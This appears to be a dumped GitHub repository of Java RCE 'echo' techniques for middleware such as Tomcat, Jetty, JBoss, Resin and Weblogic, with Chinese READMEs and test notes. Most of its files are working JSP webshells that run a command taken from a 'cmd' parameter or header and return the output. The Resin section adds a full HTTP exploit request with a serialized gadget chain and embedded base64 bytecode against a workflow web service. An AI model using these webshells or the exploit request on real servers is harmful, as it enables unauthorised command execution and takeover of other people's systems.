├── JBoss(Wildfly)
├── README.md
├── code
│ └── JBossEcho.jsp
└── img
│ └── JBossEcho.png
├── Jetty
├── README.md
├── code
│ ├── jetty789Echo.jsp
│ ├── jetty78Echo.jsp
│ └── jetty9Echo.jsp
└── img
│ ├── 001.png
│ ├── 20200628001.png
│ ├── 20200628002.png
│ └── 20200628003.png
├── Linux
├── README.md
├── code
│ ├── case1.jsp
│ ├── case2-Deprecated.jsp
│ └── case2.jsp
└── imgs
│ ├── 20200621-001.png
│ ├── 20200621-002.png
│ ├── 20200621-003.png
│ └── 20200621-004.png
├── README.md
├── Resin
├── README.md
├── code
│ ├── doCreateWorkflowRequest.xml
│ ├── resinEcho.java
│ ├── resinEcho.jsp
│ ├── resinEcho.xml
│ ├── submitWorkflowRequest.xml
│ └── xmlRceWeaver.java
└── img
│ ├── 001.png
│ ├── 002.png
│ └── 003.png
├── Spring
├── README.md
├── code
│ ├── SpringMVCTestController.java
│ └── SpringWebFlowTestController.java
└── imgs
│ └── 20200621-001.png
├── Tomcat
├── Java Object Searcher search result
│ ├── tomat 6.0.53 result.txt
│ ├── tomcat 7.0.34 result.txt
│ ├── tomcat 7.0.96 result.txt
│ ├── tomcat 8.0.48 result.txt
│ ├── tomcat 8.5.53 result.txt
│ └── tomcat 9.0.33 result.txt
├── README.md
├── code
│ ├── Tomcat6Echo-deprecated.jsp
│ ├── Tomcat78Echo-deprecated.jsp
│ ├── Tomcat9Echo-deprecated.jsp
│ ├── TomcatEcho-全版本.jsp
│ ├── TomcatEchoTypeB-全版本.jsp
│ └── 根据网上流传的xary payload提取的tomcat回显字节码文件.class
└── imgs
│ ├── Tomcat6 Search Result.png
│ ├── Tomcat6.png
│ ├── Tomcat7 Search Result.png
│ ├── Tomcat7.png
│ ├── Tomcat8 Search Result.png
│ ├── Tomcat8.5 Search Result.png
│ ├── Tomcat8.5.png
│ ├── Tomcat8.png
│ ├── Tomcat9 Search Result.png
│ └── Tomcat9.png
├── Websphere
├── README.md
├── code
│ └── websphereEcho.jsp
└── img
│ └── 001.png
├── Windows
├── README.md
├── code
│ ├── WindowsEcho-Deprecated.jsp
│ └── WindowsEcho.jsp
└── img
│ ├── Jetty.png
│ ├── Resin.png
│ └── Tomcat.png
├── weblogic
├── README.md
├── code
│ ├── WeblogicEcho.jsp
│ ├── weblogic-10.0.3-deprecated.jsp
│ └── weblogic-12.1.3-deprecated.jsp
└── img
│ ├── x001.png
│ └── x002.png
├── 全自动挖掘 request 回显
├── README.md
├── code
│ ├── Step1-deprecated.jsp
│ ├── Step1.jsp
│ ├── Step2-deprecated.jsp
│ └── Step2.jsp
└── img
│ ├── step1.png
│ └── step2.png
├── 写文件
├── README.md
├── code
│ └── writeFile.jsp
└── img
│ ├── 001.png
│ └── 002.png
└── 集成到ysoserial
└── DirectiveProcessor.java
/JBoss(Wildfly)/README.md:
--------------------------------------------------------------------------------
1 | # JBoss(Wildfly) 回显
2 |
3 | ## 效果
4 | /img/JBossEcho.png)
5 |
6 | ## 参考
7 | [https://developer.jboss.org/thread/169877](https://developer.jboss.org/thread/169877)
8 |
--------------------------------------------------------------------------------
/JBoss(Wildfly)/code/JBossEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | io.undertow.servlet.spec.HttpServletRequestImpl req = (io.undertow.servlet.spec.HttpServletRequestImpl) javax.security.jacc.PolicyContext.getContext("javax.servlet.http.HttpServletRequest");
4 | String cmd = req.getParameter("cmd");
5 | if(cmd != null && !cmd.isEmpty()) {
6 | java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
7 | java.io.OutputStream os = req.getExchange().getOutputStream();
8 |
9 | byte[] bytes = new byte[1024];
10 | int len = 0;
11 | while ((len = in.read(bytes)) != -1) {
12 | os.write(bytes, 0, len);
13 | }
14 |
15 | os.close();
16 | in.close();
17 | }
18 | %>
--------------------------------------------------------------------------------
/JBoss(Wildfly)/img/JBossEcho.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/JBoss(Wildfly)/img/JBossEcho.png
--------------------------------------------------------------------------------
/Jetty/README.md:
--------------------------------------------------------------------------------
1 | # Jetty Echo
2 | ## 说明
3 | 直接参考 ```c0ny1``` 文章中的截图,找到 ```httpConnection``` 对象,编写代码实现回显
4 | 
5 | 
6 |
7 | ## 效果
8 | 
9 |
10 | ## 踩坑
11 | 当拿到 ```httpConnection``` 对象时,想直接调用其 ```send``` 方法实现回显,发现报错。进一步测试发现,对拿到的 ```httpConnection``` 执行 ```instanceof HttpConnection``` 时返回 ```false```,
12 | 经过询问朋友 ```Pine.lin``` 才得知,我拿到的 ```httpConnection``` 对象和 ```import``` 进来的对象竟然使用的是不同的类加载器(很奇怪),从而导致了这个问题,导致我在这里卡了很久,
13 | 非常感谢 ```Pine.lin``` 的帮忙。
14 | 
15 |
16 | ## 参考
17 | * [半自动化挖掘request实现多种中间件回显](https://mp.weixin.qq.com/s/uWyHRexDZWQwp81lWjmqqw)
18 | * [https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/server/HttpConnection.html](https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/server/HttpConnection.html)
19 |
--------------------------------------------------------------------------------
/Jetty/code/jetty789Echo.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(int i = 0; i < obj_arr.length; i++){
14 | Object o = obj_arr[i];
15 | if(o == null) continue;
16 |
17 | field = o.getClass().getDeclaredField("value");
18 | field.setAccessible(true);
19 | obj = field.get(o);
20 |
21 | if(obj != null && obj.getClass().getName().endsWith("AsyncHttpConnection")){
22 | Object connection = obj;
23 | java.lang.reflect.Method method = connection.getClass().getMethod("getRequest", null);
24 | obj = method.invoke(connection, null);
25 |
26 | method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
27 | String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
28 |
29 | if(cmd != null && !cmd.isEmpty()){
30 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
31 |
32 | method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
33 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
34 | printWriter.println(res);
35 | }
36 |
37 | break;
38 | }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
39 | java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
40 | Object httpChannel = method.invoke(obj, null);
41 |
42 | method = httpChannel.getClass().getMethod("getRequest", null);
43 | obj = method.invoke(httpChannel, null);
44 |
45 | method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
46 | String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
47 | if(cmd != null && !cmd.isEmpty()){
48 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
49 |
50 | method = httpChannel.getClass().getMethod("getResponse", null);
51 | obj = method.invoke(httpChannel, null);
52 |
53 | method = obj.getClass().getMethod("getWriter", null);
54 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
55 | printWriter.println(res);
56 | }
57 |
58 | break;
59 | }
60 | }
61 | %>
--------------------------------------------------------------------------------
/Jetty/code/jetty78Echo.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(Object o : obj_arr){
14 | if(o == null) continue;
15 |
16 | field = o.getClass().getDeclaredField("value");
17 | field.setAccessible(true);
18 | obj = field.get(o);
19 | if(obj != null && obj.getClass().getName().endsWith("AsyncHttpConnection")){
20 | Object connection = obj;
21 | java.lang.reflect.Method method = connection.getClass().getMethod("getRequest");
22 | obj = method.invoke(connection);
23 |
24 | method = obj.getClass().getMethod("getHeader", String.class);
25 | String cmd = (String)method.invoke(obj, "cmd");
26 | if(cmd != null && !cmd.isEmpty()){
27 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
28 |
29 | method = connection.getClass().getMethod("getPrintWriter", String.class);
30 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
31 | printWriter.println(res);
32 | }
33 |
34 | break;
35 | }
36 | }
37 | %>
--------------------------------------------------------------------------------
/Jetty/code/jetty9Echo.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(Object o : obj_arr){
14 | if(o == null) continue;
15 |
16 | field = o.getClass().getDeclaredField("value");
17 | field.setAccessible(true);
18 | obj = field.get(o);
19 | if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
20 | java.lang.reflect.Method method = obj.getClass().getMethod("getHttpChannel");
21 | Object httpChannel = method.invoke(obj);
22 |
23 | method = httpChannel.getClass().getMethod("getRequest");
24 | obj = method.invoke(httpChannel);
25 |
26 | method = obj.getClass().getMethod("getHeader", String.class);
27 | String cmd = (String)method.invoke(obj, "cmd");
28 | if(cmd != null && !cmd.isEmpty()){
29 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
30 |
31 | method = httpChannel.getClass().getMethod("getResponse");
32 | obj = method.invoke(httpChannel);
33 |
34 | method = obj.getClass().getMethod("getWriter");
35 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
36 | printWriter.println(res);
37 | }
38 |
39 | break;
40 | }
41 | }
42 | %>
--------------------------------------------------------------------------------
/Jetty/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/001.png
--------------------------------------------------------------------------------
/Jetty/img/20200628001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/20200628001.png
--------------------------------------------------------------------------------
/Jetty/img/20200628002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/20200628002.png
--------------------------------------------------------------------------------
/Jetty/img/20200628003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/20200628003.png
--------------------------------------------------------------------------------
/Linux/README.md:
--------------------------------------------------------------------------------
1 | # Linux 通用回显
2 |
3 | ## 说明
4 | * case1.jsp 中的代码逻辑较为简单,遍历当前进程 ```fd``` 目录下的所有和 ```socket``` 相关的 ```fd``` 文件,并输出结果,效果如下
5 | 
6 | 但是这种方法存在二个缺陷:
7 | * 会影响同一时间点所有访问网站的用户(也会看到自定义回显的结果)
8 | * 导致应用崩溃
9 | * 使用本地虚拟机 ```Kali Linux``` 搭建的 ```Tomcat 9.0.36``` 测试,Tomcat 进程不会崩溃
10 | * 使用 ```腾讯云VPS``` 搭建的 ```Tomcat 8.5.56``` 测试,连续访问此文件 ```8```次左右,应用崩溃(Tomcat 进程还在,但是不会再监听 ```8080``` 端口),且有时候重启 Tomcat 也没用,Tomcat 依然会报 ```java.io.IOException: Bad file descriptor``` 错误,需要重启 VPS
11 | 
12 | 
13 | * case2.jsp 中的代码通过延迟等方法来确定唯一正确的 ```fd``` 文件,不会影响访问网站的其他用户,也不会导致应用崩溃
14 | 
15 |
16 | ## 参考
17 | * [linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307)
18 | * [通杀漏洞利用回显方法-linux平台](https://www.00theway.org/2020/01/17/java-god-s-eye/)
19 |
20 |
--------------------------------------------------------------------------------
/Linux/code/case1.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | String command = "ls -l /proc/$PPID/fd|grep socket:|awk '{print $9}'";
4 |
5 | java.util.List list = new java.util.ArrayList<>();
6 | String[] cmd = new String[]{"/bin/sh", "-c", command };
7 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
8 |
9 | String line;
10 | while ((line = br.readLine()) != null){
11 | list.add(line);
12 | }
13 |
14 | br.close();
15 |
16 | java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
17 | c.setAccessible(true);
18 |
19 | for(String s : list){
20 | Integer integer = Integer.parseInt(s);
21 |
22 | try{
23 | cmd = new String[]{"/bin/sh", "-c", "ls -l" };
24 | br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
25 |
26 | StringBuilder sb = new StringBuilder();
27 | while ((line = br.readLine()) != null){
28 | sb.append(line + "\n");
29 | }
30 |
31 | java.io.FileOutputStream os = new java.io.FileOutputStream(c.newInstance(integer));
32 | os.write(sb.toString().getBytes());
33 |
34 | br.close();
35 | os.close();
36 | }catch(Exception e){}
37 | }
38 | %>
--------------------------------------------------------------------------------
/Linux/code/case2-Deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
4 | String[] cmd = new String[]{"/bin/sh", "-c", command };
5 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
6 | java.util.List res1 = new java.util.ArrayList();
7 | String line = "";
8 | while ((line = br.readLine()) != null){
9 | res1.add(line);
10 | }
11 | br.close();
12 |
13 | Thread.sleep((long)2000);
14 |
15 | command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
16 | cmd = new String[]{"/bin/sh", "-c", command };
17 | br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
18 | java.util.List res2 = new java.util.ArrayList();
19 | while ((line = br.readLine()) != null){
20 | res2.add(line);
21 | }
22 | br.close();
23 |
24 | int index = 0;
25 | int max = 0;
26 | for(int i = 0; i < res1.size(); i++){
27 | for(int j = 0; j < res2.size(); j++){
28 | if(((String)res2.get(j)).contains((String)res1.get(i))){
29 | String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
30 | socketNo = socketNo.substring(0, socketNo.length() - 1);
31 | if(Integer.parseInt(socketNo) > max) {
32 | max = Integer.parseInt(socketNo);
33 | index = j;
34 | }
35 | }
36 | }
37 | }
38 |
39 | int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
40 | java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
41 | c.setAccessible(true);
42 | cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
43 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
44 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
45 | java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
46 | os.write(result.getBytes());
47 | %>
--------------------------------------------------------------------------------
/Linux/code/case2.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | if(java.io.File.separator.equals("/")){
4 | String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
5 | String[] cmd = new String[]{"/bin/sh", "-c", command};
6 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
7 | java.util.List res1 = new java.util.ArrayList();
8 | String line = "";
9 | while ((line = br.readLine()) != null && !line.trim().isEmpty()){
10 | res1.add(line);
11 | }
12 | br.close();
13 |
14 | try {
15 | Thread.sleep((long)2000);
16 | } catch (InterruptedException e) {
17 | //pass
18 | }
19 |
20 | command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
21 | cmd = new String[]{"/bin/sh", "-c", command};
22 | br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
23 | java.util.List res2 = new java.util.ArrayList();
24 | while ((line = br.readLine()) != null && !line.trim().isEmpty()){
25 | res2.add(line);
26 | }
27 | br.close();
28 |
29 | int index = 0;
30 | int max = 0;
31 | for(int i = 0; i < res2.size(); i++){
32 | try{
33 | String socketNo = ((String)res2.get(i)).split("\\s+")[1].substring(8);
34 | socketNo = socketNo.substring(0, socketNo.length() - 1);
35 | for(int j = 0; j < res1.size(); j++){
36 | if(!socketNo.equals(res1.get(j))) continue;
37 |
38 | if(Integer.parseInt(socketNo) > max) {
39 | max = Integer.parseInt(socketNo);
40 | index = j;
41 | }
42 | break;
43 | }
44 | }catch(Exception e){
45 | //pass
46 | }
47 | }
48 |
49 | int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
50 | java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
51 | c.setAccessible(true);
52 | cmd = new String[]{"/bin/sh", "-c", "id"};
53 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
54 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
55 | java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
56 | os.write(result.getBytes());
57 | }
58 | %>
--------------------------------------------------------------------------------
/Linux/imgs/20200621-001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-001.png
--------------------------------------------------------------------------------
/Linux/imgs/20200621-002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-002.png
--------------------------------------------------------------------------------
/Linux/imgs/20200621-003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-003.png
--------------------------------------------------------------------------------
/Linux/imgs/20200621-004.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-004.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Java RCE 回显
2 |
3 | ### 支持的回显测试代码
4 | - [x] Linux通用回显
5 | - [x] Windows通用回显
6 | - [x] Spring回显
7 | - [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22)
8 | - [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0)
9 | - [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5))
10 | - [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1)
11 | - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15)
12 | - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908,
13 | failed on 8.0.3.v20160908, 7.2.1.v20101111)
14 | - [x] 全自动挖掘 request 回显
15 | - [x] 写文件回显
16 |
17 | 如果有好的建议,欢迎提 ```issue```
18 |
--------------------------------------------------------------------------------
/Resin/README.md:
--------------------------------------------------------------------------------
1 | # Resin Echo
2 | ## 说明
3 | 直接参考 ```c0ny1``` 文章中的截图,找到 ```HttpRequest``` 对象,编写代码实现回显
4 | 
5 | 
6 |
7 | ## 效果
8 | 
9 |
10 | ## 参考
11 | * [半自动化挖掘request实现多种中间件回显](https://mp.weixin.qq.com/s/uWyHRexDZWQwp81lWjmqqw)
12 | * [http://javadoc4.caucho.com/com/caucho/server/http/HttpRequest.html](http://javadoc4.caucho.com/com/caucho/server/http/HttpRequest.html)
13 |
--------------------------------------------------------------------------------
/Resin/code/doCreateWorkflowRequest.xml:
--------------------------------------------------------------------------------
1 | POST /services%20/WorkflowServiceXml HTTP/1.1
2 | Host: 127.0.0.1:8080
3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
4 | Content-Type: text/xml
5 | session:whoami
6 | Content-Length: 6581
7 | Connection: close
8 |
9 |
10 |
11 |
12 |
13 | <java.util.PriorityQueue serialization="custom">
14 | <unserializable-parents/>
15 | <java.util.PriorityQueue>
16 | <default>
17 | <size>2</size>
18 | <comparator class="org.apache.commons.beanutils.BeanComparator">
19 | <property>outputProperties</property>
20 | <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>
21 | </comparator>
22 | </default>
23 | <int>3</int>
24 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
25 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
26 | <default>
27 | <__name>a</__name>
28 | <__bytecodes>
29 | <byte-array>yv66vgAAADMBQQoAlQCWCgCVAJcIAJgKAJkAmggAYQcAmwoABgCcBwCdCgCeAJ8HAKAKAAoAoQcAogsADACjCgCkAKUKAKQApgoApACnCgBUAKgIAKkKAAoAqggAqwoArACtCgAZAK4IAK8KABkAsAcAsQgAsggAswgAtAgAtQcAtgcAtwoAHwC4CgAfALkKALoAuwoAHgC8CAC9CgAeAL4KAB4AvwkArADACADBCgDCAKUKAFMAwwgAxAoArADFCgDGAMcKABkAyAoAGQDJCADKCADLCgCZAMwKAM0AzggAzwoABgDQCgDRANIKANMA1AoAGQDVCADWBwDXCgA6AKgKABkA2AoAGQDZCgA6ANoIANsKADoAxwgA3AgA3QoA3gDfCgDgAOEIAOIIAOMKABkA5AgA5QcA5goASQCoCgBJAOcHAOgKAEwA6QoATADqCgBMAKcIAOsHAOwKAFEA7QcA7gcA7wcA8AEAC3Nob3dSZXNwb3NlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA5MeG1sUmNlV2VhdmVyOwEABHZhcjEBABJMamF2YS9sYW5nL1N0cmluZzsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQADcmVwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAA291dAEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEACkV4Y2VwdGlvbnMBAAY8aW5pdD4BAAMoKVYBAANjbWQBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEACkNtZGNvbnRleHQBAAhlY2hvaW5mbwEABWJ5dGVzAQACW0IBAAtjb250ZXh0UGF0aAEAA2NscwEABHBhdGgBABBmaWxlT3V0cHV0U3RyZWFtAQAaTGphdmEvaW8vRmlsZU91dHB1dFN0cmVhbTsBAAdjb250ZW50AQARU2VydmxldEludm9jYXRpb24BAAR2YXI2AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcA7gcAmwcA8QcAoAcAsQcAbgcA7AEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAPIBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBABF4bWxSY2VXZWF2ZXIuamF2YQcA8wwA9AD1DAD2APcBACxjb20uY2F1Y2hvLnNlcnZlci5kaXNwYXRjaC5TZXJ2bGV0SW52b2NhdGlvbgcA+AwA+QD6AQAPamF2YS9sYW5nL0NsYXNzDAD7APwBABBqYXZhL2xhbmcvT2JqZWN0BwDxDAD9AP4BAC1jb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGwMAP8BAAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAEBAQIHAQMMAQQAVwwBBQBrDAEGAGsMAGoAawEAB1Nlc3Npb24MAQcBCAEAB29zLm5hbWUHAQkMAQoBCAwBCwEMAQAGd2luZG93DAENAQ4BABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jAQACc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABqAJEMAQ8BEAcBEQwBEgETDABqARQBAAJcQQwBFQEWDAEXAQwMARgBGQEAG1RoaXMgaXMgIGFuICBlcnJvciBtZXNzYWdlLgcBGgwAVgBXAQAERWNobwwBGwEcBwEdDAEeAQwMAR8BIAwAagEhAQAIU2hvd1BhdGgBAAAMASIBIwcBJAwBJQEMAQAtY29tLmNhdWNoby5zZXJ2ZXIuaHR0cC5IdHRwU2VydmxldFJlcXVlc3RJbXBsDAEmAScHASgMASkBKgcBKwwBLAEtDAEuAS8BAAdlY29sb2d5AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMATABMQwBMgEMDAEzATQBACZlY29sb2d5L1dFQi1JTkYvcHJvcC93ZWF2ZXIucHJvcGVydGllcwEAGwpbK113ZWF2ZXIgZGF0YWJhc2UgcGF0aDogCgEAAQoHATUMATYBNwcBOAwBOQE6AQAcWytdIHdlYXZlciBkYXRhYmFzZSBzdWNjZXNzOgEABVdQYXRoDAE7ATwBAAhXQ29udGVudAEAFnN1bi9taXNjL0JBU0U2NERlY29kZXIMAT0BPgEAGGphdmEvaW8vRmlsZU91dHB1dFN0cmVhbQwAagBXDAE/ASEBABFbK10gV3JpdGUgU3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24MAUAAawEADHhtbFJjZVdlYXZlcgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9UaH